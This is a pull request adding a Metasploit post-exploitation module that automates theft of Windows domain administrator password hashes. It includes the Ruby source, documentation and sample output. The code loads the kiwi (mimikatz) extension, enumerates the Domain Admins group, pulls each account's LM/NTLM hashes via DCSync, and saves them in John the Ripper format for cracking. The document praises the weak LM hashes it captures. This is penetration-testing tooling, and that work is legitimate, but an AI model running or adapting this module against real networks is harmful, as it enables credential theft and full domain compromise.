### PR TITLE
Domain admin hash retrieval automation (enum_domain_admin_hashes)

### DIFF
--- a/documentation/modules/post/windows/gather/enum_domain_admin_hashes.md
+++ b/documentation/modules/post/windows/gather/enum_domain_admin_hashes.md
@@ -1,0 +1,31 @@
+## Vulnerable Application
+
+  The post-exploitation module, `windows/gather/enum_domain_admin_hashes`, is useful for gathering Windows domain administrator password hashes in JTR format.  This module has been observed to obtain more critically-weak LM hashes versus other methods (such as impacket's secretsdump.py).
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Obtain a meterpreter session under the context of a domain administrator (or any account with domain DCSync privileges).
+  3. Do: ```run post/windows/gather/enum_domain_admin_hashes```
+  4. The reported loot file should now have password hashes in JTR-formatted (many of which should include weak LM hashes!).
+
+## Options
+
+  No options are available.
+
+## Scenarios
+
+  ```
+meterpreter > run post/windows/gather/enum_domain_admin_hashes 
+
+[*] Loading kiwi module...
+[*] Enumerating members of "Domain Admins" group for domain ACME...
+[*] Found 5 domain admin accounts.
+[+] ACME\Administrator:500:81****************************:b7****************************:::
+[+] ACME\janesmith:5000:04****************************:af****************************:::
+[+] ACME\johnsmith:5001:5b****************************:e1****************************:::
+[+] ACME\lafawnduh:5002:4d****************************:1d****************************:::
+[+] ACME\reginaldsmith:5003:ec****************************:20****************************:::
+[*] Domain admin hash enumeration complete.
+[*] Hashes stored in JTR format in /home/jdog/.msf4/loot/20180508180027_default_10.10.10.154_windows.hashes_65325.txt
+  ```

--- a/modules/post/windows/gather/enum_domain_admin_hashes.rb
+++ b/modules/post/windows/gather/enum_domain_admin_hashes.rb
@@ -1,0 +1,98 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Windows Gather Domain Administrator Hashes',
+      'Description'   => %q(This script automates the retrieval of domain administrator hashes into JTR format, using the kiwi module's dcsync_ntlm function.  Obviously, the user session must have DCSync privileges \(commonly, a domain administrator\). This method is superior to others because it also obtains the weak LM hashes, making cracking extremely effective.),
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'Joe Testa <jtesta[at]positronsecurity.com>' ],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ]
+    ))
+  end
+
+  def run
+
+    # Load the kiwi module if it isn't loaded already.
+    unless client.kiwi
+      print_status("Loading kiwi module...")
+      session.core.use("kiwi")
+    end
+
+    # Ensure the kiwi module is now loaded, otherwise terminate.
+    unless client.kiwi
+      print_error("Failed to load kiwi module!")
+      return
+    end
+
+    domain = get_env("USERDOMAIN")
+    print_status("Enumerating members of \"Domain Admins\" group for domain #{domain}...")
+
+    # Get the list of domain administrators
+    net_group_output = cmd_exec("net group \"Domain Admins\" /domain")
+
+    # Parse the domain admins out of the 'net group' output.
+    domain_admins = get_members(net_group_output.split("\n"))
+
+    # If the domain admins group is empty, we must have parsed it wrong...
+    if domain_admins.empty?
+      print_error("\"Domain Admins\" group is somehow empty!  The raw output of the net group command is: #{net_group_output}")
+      return
+    end
+
+    print_status("Found #{domain_admins.length} domain admin accounts.")
+
+    # Go through each domain admin and run kiwi's dcsync_ntlm function on it.
+    loot = []
+    domain_admins.each do |domain_admin|
+      res = client.kiwi.dcsync_ntlm(domain_admin)
+
+      # Sometimes nothing is returned unless the domain is prepended.
+      if not res
+        res = client.kiwi.dcsync_ntlm("#{domain}\\#{domain_admin}")
+      end
+      if res
+        lm = res[:lm]
+        if lm == '<NOT FOUND>'
+          lm = 'aad3b435b51404eeaad3b435b51404ee'
+        end
+        hash = "#{domain}\\#{domain_admin}:#{res[:rid]}:#{lm}:#{res[:ntlm]}:::"
+        print_good(hash)
+        loot.push(hash)
+      else
+        print_error("Failed to retrieve hash for #{domain}\\#{domain_admin}.")
+      end
+    end
+
+    print_status("Domain admin hash enumeration complete.")
+
+    # Store the hashes, if we have any.
+    if not loot.empty?
+      loot_file = store_loot("windows.hashes", "text/plain", session, loot.join("\n"), nil, "Windows Hashes")
+      print_status("Hashes stored in JTR format in #{loot_file}")
+    end
+  end
+
+  # Taken from post/windows/gather/enum_domain_group_users.rb.
+  def get_members(results)
+    members = []
+
+    # Usernames start somewhere around line 6
+    results = results.slice(6, results.length)
+    # Get group members from the output
+    results.each do |line|
+      line.split("  ").compact.each do |user|
+        next if user.strip == ""
+        next if user =~ /-----/
+        next if user =~ /The command completed successfully/
+        members << user.strip
+      end
+    end
+
+    members
+  end
+end


### PR DESCRIPTION
This adds a new post module, `windows/gather/enum_domain_admin_hashes.rb`, which is useful for automating the retrieval of Windows domain admin password hashes in JTR format using the `kiwi` extension.

This module has been observed to obtain more critically-weak LanMan hashes versus other methods (such as impacket's secretsdump.py).

## Verification

- [ ] Obtain a meterpreter session under the context of a domain administrator (or any account with domain DCSync privileges).
- [ ] Do: `run post/windows/gather/enum_domain_admin_hashes`
- [ ] Verify that the correct number of domain admin accounts are enumerated.
- [ ] Verify that the loot file output is in proper JTR format.

## Output

  ```
meterpreter > run post/windows/gather/enum_domain_admin_hashes 

[*] Loading kiwi module...
[*] Enumerating members of "Domain Admins" group for domain ACME...
[*] Found 5 domain admin accounts.
[+] ACME\Administrator:500:81****************************:b7****************************:::
[+] ACME\janesmith:5000:04****************************:af****************************:::
[+] ACME\johnsmith:5001:5b****************************:e1****************************:::
[+] ACME\lafawnduh:5002:4d****************************:1d****************************:::
[+] ACME\reginaldsmith:5003:ec****************************:20****************************:::
[*] Domain admin hash enumeration complete.
[*] Hashes stored in JTR format in /home/jdog/.msf4/loot/20180508180027_default_10.10.10.154_windows.hashes_65325.txt
  ```
